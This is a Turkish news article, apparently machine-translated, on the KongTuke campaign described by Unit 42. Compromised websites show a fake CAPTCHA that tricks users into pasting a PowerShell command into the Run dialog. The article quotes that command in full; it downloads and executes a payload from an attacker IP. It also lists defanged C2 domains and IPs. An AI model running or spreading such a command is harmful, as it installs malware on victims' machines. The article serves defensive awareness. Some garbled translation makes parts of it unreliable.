“Kongtuke” adlı siber güvenlik araştırmacıları tarafından “Kongtuke” adlı sofistike yeni bir siber saldırı zinciri, şüphesiz İnternet kullanıcılarını tehlikeye atılmış meşru web siteleri aracılığıyla hedef aldı.
Palo Alto Networks birim 42 ekibinden Bradley Duncan’ın bir raporunda ayrıntılı olarak açıklanan bu saldırı, kurbanların panolarını ele geçirmek ve potansiyel olarak tanımlanamayan kötü amaçlı yazılım yüklemek için kötü amaçlı senaryolar ve sahte captcha sayfalarından yararlanıyor.
Bulgular 4 Nisan 2025’te, X’te birim 42 Intel tarafından yayınlanan ve bu kampanyanın artan tehdidini vurgulayan ek bilgilerle paylaşıldı.
Saldırı Zinciri
Kongtuke saldırısı, meşru ama savunmasız web sitelerine enjekte edilen kötü niyetli bir senaryo ile başlar. Raporda belirtilen böyle bir örnek HXXPS: // Lancasternh[.]com/6t7y.js, kullanıcıları hxxps: // lancasternh adresindeki ikincil bir komut dosyasına yönlendiren[.]com/js.php.
Bu komut dosyası, Base64 formatında kodlanmış IP adresi, tarayıcı türü ve yönlendirici verileri dahil, kurbanın cihazı hakkında ayrıntılı bilgi toplar.
Oradan, kullanıcılar, insanları botlardan ayırt etmek için ortak bir güvenlik özelliği olan bir captcha’yı taklit eden aldatıcı bir “insan olduğunuzu doğrulayın” sayfasına yönlendirilir.
Ancak, bu captcha bir hile. Kimliği doğrulamak yerine, sayfada “pano kaçırma” veya “çantalama” olarak bilinen bir teknik kullanır. Kullanıcının bir Windows Run penceresi üzerinden yapıştırmaya ve yürütmeye çağıran talimatlarla birlikte kurbanın panosuna kötü niyetli bir PowerShell komut dosyası enjekte eder.
Söz konusu senaryo, Duncan tarafından detaylandırıldığı gibi:
powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"Bu komut, 138.199.156 numaralı telefondan uzak bir sunucuya bağlanır.[.]22: 8080, bir zaman damgası hesaplamasına dayalı ek kötü amaçlı yüklerin alınması.
Trafik ve enfeksiyon sonrası aktivite
Birim 42 raporuna göre, yürütüldüğünde, komut dosyası bir dizi ağ isteği başlatır. İlk trafik, aynı IP adresine GET ve Gönderme İsteklerini içerir ve bunu ECDUUTCYKPVKBIM gibi alanlara bağlantılar içerir[.]üst ve bfidmcjejlilflg[.]tepe.
185.250.151’de barındırılan bu alanlar[.]155: 80, daha fazla enfeksiyon için evreleme noktaları olarak hizmet ediyor gibi görünüyor. Enfeksiyon sonrası, tehlikeye atılan sistem 8qvihxy8x5nyixj ile komut ve kontrol (C2) iletişimi oluşturur[.]173.232.146 üzerinden TLSV1.0 HTTPS trafiği üzerinde[.]62: 25658.
İlginç bir şekilde, enfekte ana bilgisayar ayrıca API.Ipify gibi hizmetleri kullanarak bir IP adresi kontrolü gerçekleştirir[.]Org ve Ipinfo[.]IO, şehir, bölge ve ülke gibi coğrafi konum verilerinin toplanması. Bu adım doğal olarak kötü niyetli olmasa da, saldırganların kurbanlarını hedeflenen sömürü için profil ettiğini gösteriyor.
Tanıdık ama zor bir tehdit
Kongtuke kampanyası, #Kongtuke hashtag’i altında Mastodon’da @Monitorsg ve Tehditfox da dahil olmak üzere siber güvenlik toplulukları tarafından izlendi.
Duncan, enfeksiyon sonrası trafiğin, tanınmış bir uzaktan erişim Truva atı olan Asyncrat ile gözlemlenen kalıplarla benzerlikler taşıdığını belirtiyor.
Ancak, araştırmacılar henüz analiz için bir örnek almadığından, son kötü amaçlı yazılım yükü tanımlanmamıştır. Bu belirsizlik, tehdidin gelişen doğasını ve bununla mücadelede zorlukların altını çiziyor.
Ünite 42 Intel, 4 Nisan 2025’te halkı uyarmak için X’e aldı: “Meşru ancak uzlaşmış web sitelerinden sayfalarda #Kongtuke betiği enjekte etti.
Bu sayfalar kullanıcılardan kötü amaçlı komut dosyasını bir çalıştırma penceresine yapıştırmalarını istiyor. ” Https://x.com/unit42_intel/status/190825383016323637 adresinden erişilebilir olan yazı, daha fazla ayrıntıya ve sahte captcha sayfasının görseline bir bağlantı ve farkındalık aciliyetini vurguladı.
Raporun yazarı Bradley Duncan, bu saldırının sinsi doğasını notlarında vurguladı: “Bu sürece bazen ‘Pano Kaçaklığı’ veya ‘Mastoecting,’ kullanıcıları rutin bir doğrulama kisvesi altında zararlı kod yürütmeye kandırıyor.”
Tahminen meşru web sitelerinin kullanılması, saldırıyı özellikle tehlikeli hale getiren bir güven katmanı ekler.
Siber güvenlik uzmanları, kullanıcıları captcha istemleriyle, özellikle de manuel komut dosyası yürütme isteyenler ile karşılaşırken dikkatli olmaya teşvik eder.
Meşru captchas genellikle kod kopyalama ve yapıştırma değil, görüntü seçimi gibi basit görevleri içerir.
Kullanıcılar ayrıca sistemlerini güncel tutmalı, şüpheli bağlantıları tıklamaktan kaçınmalı ve bu tür tehditleri tespit etmek ve engellemek için sağlam antivirüs yazılımı kullanmalıdır.
Kongtuke kampanyası gelişmeye devam ettikçe, 42. ve ötesindeki araştırmacılar, son kötü amaçlı yazılımları tanımlamak ve saldırı altyapısını bozmak için çalışıyorlar. Şimdilik, uyanıklık, günlük web etkileşimlerinde bu kurnaz güven sömürüsüne karşı en iyi savunma olmaya devam ediyor.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin